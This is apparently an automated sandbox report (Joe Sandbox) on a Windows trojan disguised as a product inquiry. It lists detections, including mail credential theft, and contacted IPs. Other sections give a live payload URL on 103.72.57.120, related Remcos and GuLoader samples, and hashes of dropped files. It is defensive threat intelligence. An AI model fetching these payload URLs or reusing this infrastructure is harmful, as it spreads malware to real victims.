60 Tries to steal Mail credentials (via file / registry access) 24->60

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Image_Product_Inquiry_Request_Villoslada.exe3%ReversingLabs
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\Temp\Hedgiest165.exe3%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://103.72.57.120/TGIF/tspPz136.bin100%Avira URL Cloudmalware
            http://103.72.57.120/TGIF/tspPz136.bin=9100%Avira URL Cloudmalware
            NameIPActiveMaliciousAntivirus DetectionReputation
            geoplugin.net
            178.237.33.50
            truefalse
              high
              NameMaliciousAntivirus DetectionReputation
              http://103.72.57.120/TGIF/tspPz136.binfalse
              • Avira URL Cloud: malware
              unknown
              http://geoplugin.net/json.gpfalse
                high
                NameSourceMaliciousAntivirus DetectionReputation
                http://geoplugin.net/json.gphyqHedgiest165.exe, 00000006.00000002.3288389736.0000000005C54000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.imvu.comrHedgiest165.exe, 00000006.00000002.3298938177.0000000022190000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      high
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.2557797233.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.2557797233.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Licensepowershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.imvu.comHedgiest165.exe, Hedgiest165.exe, 00000009.00000003.2780926316.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000009.00000003.2781111296.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              high
                              https://contoso.com/Iconpowershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.nirsoft.netHedgiest165.exe, 00000007.00000002.2793761836.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                  high
                                  http://nsis.sf.net/NSIS_ErrorErrorImage_Product_Inquiry_Request_Villoslada.exe, Hedgiest165.exe.2.drfalse
                                    high
                                    https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.2557797233.0000000005206000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comHedgiest165.exe, 00000006.00000002.3298938177.0000000022190000.00000040.10000000.00040000.00000000.sdmp, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        high
                                        https://www.google.comHedgiest165.exe, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          high
                                          https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2557797233.00000000050B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://contoso.com/powershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2560365684.0000000006117000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/accounts/serviceloginHedgiest165.exefalse
                                                  high
                                                  http://103.72.57.120/TGIF/tspPz136.bin=9Hedgiest165.exe, 00000006.00000002.3288389736.0000000005C18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: malware
                                                  unknown
                                                  https://login.yahoo.com/config/loginHedgiest165.exefalse
                                                    high
                                                    http://www.nirsoft.net/Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      high
                                                      http://www.imvu.comataHedgiest165.exe, 00000009.00000003.2780926316.0000000000A1D000.00000004.00000020.00020000.00000000.sdmp, Hedgiest165.exe, 00000009.00000003.2781111296.0000000000A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2557797233.00000000050B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.ebuddy.comHedgiest165.exe, Hedgiest165.exe, 00000009.00000002.2781423800.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                            high
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            185.150.191.117
                                                            unknownUnited States
                                                            23470RELIABLESITEUStrue
                                                            103.72.57.120
                                                            unknownIndia
                                                            45062NETEASE-ASGuangzhouNetEaseComputerSystemCoLtdCNfalse
                                                            178.237.33.50
                                                            geoplugin.netNetherlands
                                                            8455ATOM86-ASATOM86NLfalse
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1552404
                                                            Start date and time:2024-11-08 18:09:04 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 28s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:10
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:Image_Product_Inquiry_Request_Villoslada.exe
                                                            Detection:MAL
                                                            Classification:mal100.phis.troj.spyw.evad.winEXE@12/19@1/3
                                                            EGA Information:
                                                            • Successful, ratio: 83.3%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 192
                                                            • Number of non-executed functions: 220
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Execution Graph export aborted for target powershell.exe, PID 7136 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing disassembly code.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            • VT rate limit hit for: Image_Product_Inquiry_Request_Villoslada.exe
                                                            TimeTypeDescription
                                                            12:09:57API Interceptor40x Sleep call for process: powershell.exe modified
                                                            12:11:42API Interceptor10x Sleep call for process: Hedgiest165.exe modified
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            185.150.191.117Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                              IMG_0055-09062024 SJGYNIQKMJ.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                Za41nm8pup.exeGet hashmaliciousRemcosBrowse
                                                                  SecuriteInfo.com.Win32.DropperX-gen.5166.30540.exeGet hashmaliciousRemcosBrowse
                                                                    Ravakhu24105.exeGet hashmaliciousRemcosBrowse
                                                                      103.72.57.120MywTxp172c.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.72.57.120/diddyishere/BSTXLearAmm145.bin
                                                                      Purchase Order.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120/TGIF/Hprrahwniil.pdf
                                                                      scan_k.szwed_2024-11-07-07-42-04_pdf .scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120/TGIF/Tczqgzpv.mp3
                                                                      SecuriteInfo.com.Win32.DropperX-gen.15115.27311.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120/diddyishere/Kqgma.wav
                                                                      SecuriteInfo.com.Win32.DropperX-gen.15115.27311.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120/diddyishere/Kqgma.wav
                                                                      Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                      • 103.72.57.120/diddyishere/YyHolEVWoHsYmSFIbeB57.bin
                                                                      Evolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120/diddyishere/Mepvmtfzu.mp3
                                                                      Evolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120/diddyishere/Mepvmtfzu.mp3
                                                                      178.237.33.50CEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Quotation Request #100028153.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      rIMGCY46473567583458675867864894698467458.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • geoplugin.net/json.gp
                                                                      RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      0jg24sHn9q.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      pagamento.UniCredit.Bank.pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      Supply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      l2StCMee3nFFvI3.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      rPO.exeGet hashmaliciousRemcosBrowse
                                                                      • geoplugin.net/json.gp
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      geoplugin.netCEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 178.237.33.50
                                                                      Quotation Request #100028153.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      rIMGCY46473567583458675867864894698467458.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 178.237.33.50
                                                                      RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 178.237.33.50
                                                                      0jg24sHn9q.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      pagamento.UniCredit.Bank.pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      Supply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 178.237.33.50
                                                                      l2StCMee3nFFvI3.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      rPO.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      RELIABLESITEUSPayload 94.75 (2).225.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.93.106.189
                                                                      SecureMessageATT.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.194.8.184
                                                                      Scan_Rev 20220731_PO&OC#88SU7782743882874_JPEG.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 104.243.33.38
                                                                      http://holidaybunch.comGet hashmaliciousUnknownBrowse
                                                                      • 104.194.8.184
                                                                      SecuriteInfo.com.BScope.Trojan.Agentb.20481.11202.msiGet hashmaliciousUnknownBrowse
                                                                      • 103.195.103.66
                                                                      Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                      • 185.150.191.117
                                                                      ppc.elfGet hashmaliciousMiraiBrowse
                                                                      • 154.16.151.108
                                                                      20240930_185453_p1uYhraXAa8FqoQDzs1lqwv0Fp3NVQrL.emlGet hashmaliciousGRQ ScamBrowse
                                                                      • 104.238.220.6
                                                                      https://pub-c5538851da6244d790b9ba2a84c8b2af.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                      • 104.194.8.184
                                                                      na.elfGet hashmaliciousMiraiBrowse
                                                                      • 45.126.216.243
                                                                      NETEASE-ASGuangzhouNetEaseComputerSystemCoLtdCNMywTxp172c.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                      • 103.72.57.120
                                                                      Purchase Order.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120
                                                                      scan_k.szwed_2024-11-07-07-42-04_pdf .scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120
                                                                      botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 42.187.28.137
                                                                      Inova oferta nr F01281624PL.htmlGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120
                                                                      sh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 103.71.132.245
                                                                      SecuriteInfo.com.Win32.DropperX-gen.15115.27311.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120
                                                                      SecuriteInfo.com.Win32.DropperX-gen.15115.27311.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120
                                                                      Priority_Quote_Request_Items_List.exeGet hashmaliciousRemcosBrowse
                                                                      • 103.72.57.120
                                                                      Evolog_sprawy24-4090.scr.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.72.57.120
                                                                      ATOM86-ASATOM86NLCEBI_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 178.237.33.50
                                                                      Quotation Request #100028153.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      asegurar.vbsGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      rIMGCY46473567583458675867864894698467458.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                      • 178.237.33.50
                                                                      RAINBOW_ tlumaczenie dokumentow dostawy do CEBI PL_ 11.08.24.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 178.237.33.50
                                                                      0jg24sHn9q.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      pagamento.UniCredit.Bank.pdf.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      Supply Contract 12 Additional Agreement to 76_24_.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                      • 178.237.33.50
                                                                      l2StCMee3nFFvI3.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      rPO.exeGet hashmaliciousRemcosBrowse
                                                                      • 178.237.33.50
                                                                      No context
                                                                      No context
                                                                      Process:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      File Type:JSON data
                                                                      Category:dropped
                                                                      Size (bytes):957
                                                                      Entropy (8bit):5.008511330476407
                                                                      Encrypted:false
                                                                      SSDEEP:24:qUdRNuKyGX85jHf3SvXhNlT3/7YvfbYro:9PN0GX85mvhjTkvfEro
                                                                      MD5:F66BB44F7622D1FF3E1D39A1B07E9F0C
                                                                      SHA1:59E5ABCA56B357B9C763DB9CE156C48A35F54790
                                                                      SHA-256:303F9597E3F295F146B92E7BC578AEA455B4078750316164C5742CC950839885
                                                                      SHA-512:6731ADCC608C4D8A41F4ADDA445EAEC1744F73A70CF39D453737C96964FD2876423A99CAEF2B07926C2DD3AD8AA851550F0D4ABDBA34080C00F350C616C96873
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:{. "geoplugin_request":"173.254.250.90",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"Killeen",. "geoplugin_region":"Texas",. "geoplugin_regionCode":"TX",. "geoplugin_regionName":"Texas",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"625",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"31.0065",. "geoplugin_longitude":"-97.8406",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/Chicago",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):14744
                                                                      Entropy (8bit):4.992175361088568
                                                                      Encrypted:false
                                                                      SSDEEP:384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
                                                                      MD5:A35685B2B980F4BD3C6FD278EA661412
                                                                      SHA1:59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
                                                                      SHA-256:3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
                                                                      SHA-512:70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                      Category:dropped
                                                                      Size (bytes):718232
                                                                      Entropy (8bit):7.923156806104517
                                                                      Encrypted:false
                                                                      SSDEEP:12288:4Mwd9MAsZuwxTSesxl98vQJXQNqlSFQkuizwFFRNkpXmGzEk/in5IAvmtnRHPG62:4Mwd9MAgSBP84JeqlSFQdimvkm2t/6kY
                                                                      MD5:74436E65E2A2612FB6A127990D81F44D
                                                                      SHA1:D3FB7C67C6441D908A91D6E6B86E38C85B47B877
                                                                      SHA-256:3E6B2955E8E0DDD77F3886B9727EA7A38657D4F0AF47130559A8CEFE1C87EA97
                                                                      SHA-512:BBD6102C6759D61CB701CF235E2BFEA442CFD702AD9DEF2E4D5134259678ECC0F79488E66D9E7BDFA39AE621F25ED5C68CCC21A298DDB5DF497BD72070C0D491
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....$_.................f...*.......4............@.......................... .......~....@.............................................Ht...........................................................................................................text....d.......f.................. ..`.rdata...............j..............@..@.data...8............~..............@....ndata...................................rsrc...Ht.......v..................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:true
                                                                      Reputation:high, very likely benign file
                                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                      Category:dropped
                                                                      Size (bytes):15728640
                                                                      Entropy (8bit):0.10106922760070924
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                      MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                      SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                      SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                      SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                      Malicious:false
                                                                      Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\AppData\Local\Temp\Hedgiest165.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):2
                                                                      Entropy (8bit):1.0
                                                                      Encrypted:false
                                                                      SSDEEP:3:Qn:Qn
                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                      Malicious:false
                                                                      Preview:..
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):314669
                                                                      Entropy (8bit):7.699725033531711
                                                                      Encrypted:false
                                                                      SSDEEP:6144:IYH3v3wtpvxmRfl/Uc3jQERpc+OYdLnEpHAyg426vBq4zyJjp9Af5g8v2nMXHunA:R3cERpQgeAb42YyJjDAf68v2M3unIBp
                                                                      MD5:8F6BC6F261F8DA4B9A6C7B31F43607EA
                                                                      SHA1:9779D645414BA4C7C48D0CCC2D9DED28C7D5EB1D
                                                                      SHA-256:20F987EC63D89DD5DF18FBE804334B7D7C55B6BF81208DED034AF6FB48C6F31A
                                                                      SHA-512:4EFCDA9C1996A8F483DA8263A9272E2696DAF16043AD6AA8AD76E97BB53AAFA447378A145445EF5F6C29548494533F9704E7C2BA2C83D2760757DD85CE24CC53
                                                                      Malicious:false
                                                                      Preview:.........~..RRR.EE..xxx.........JJJ...............................f................................d.......[[....i...Z..}..............V......s...//..C.....z.....|....uuuu.....u...t..ttttt....................+....-.................BB...........::.....-...........4.^^............................GG.X."..........L.........''......5.....66........................7...........*...b.............KK....'......jj...]]....."...88.....C..............?.QQ.....................Y............*............i........--....8...........k.....r........XX.....fff..q.....K.%%%%...MM...........S..........m............oo.....o.........................................55....................5..........................=................}}.??.T.............8......^....%..................l..,..........++.........r......................{...hhh...55........y......NN.....\\.......................................................bb.pp...................q..66.Z.fff.JJ.......................KKKK.zzz.Q..........O..ww.........|
                                                                      Process:C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exe
                                                                      File Type:ASCII text, with very long lines (4167), with CRLF, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):72314
                                                                      Entropy (8bit):5.191501379731143
                                                                      Encrypted:false
                                                                      SSDEEP:1536:tfHtG0CM/Nftwi1EVV/XN+oWtxZEFSIEH+liFZmxzXZ4tDqK+4y:tfH8A+W85d+oWtkFSIEDVtby
                                                                      MD5:E6D82E81A43A91417E599DC48AA12352
                                                                      SHA1:0FA7ED8F889897CE3E2CEF519196C420F1071D0A
                                                                      SHA-256:02ECC22DCA838AB93A43D7374BF8DB4FF608C6B2D8BB4302011D9786E09F5FE9
                                                                      SHA-512:A2EAB0E9746425A4CE2A100FF688D34E059DE229144D269A4B424B770921D4D77559855B32F4B4182BD41DB2DB49B0084036104631BE4F7B76F6F5571B6D3C77
                                                                      Malicious:false
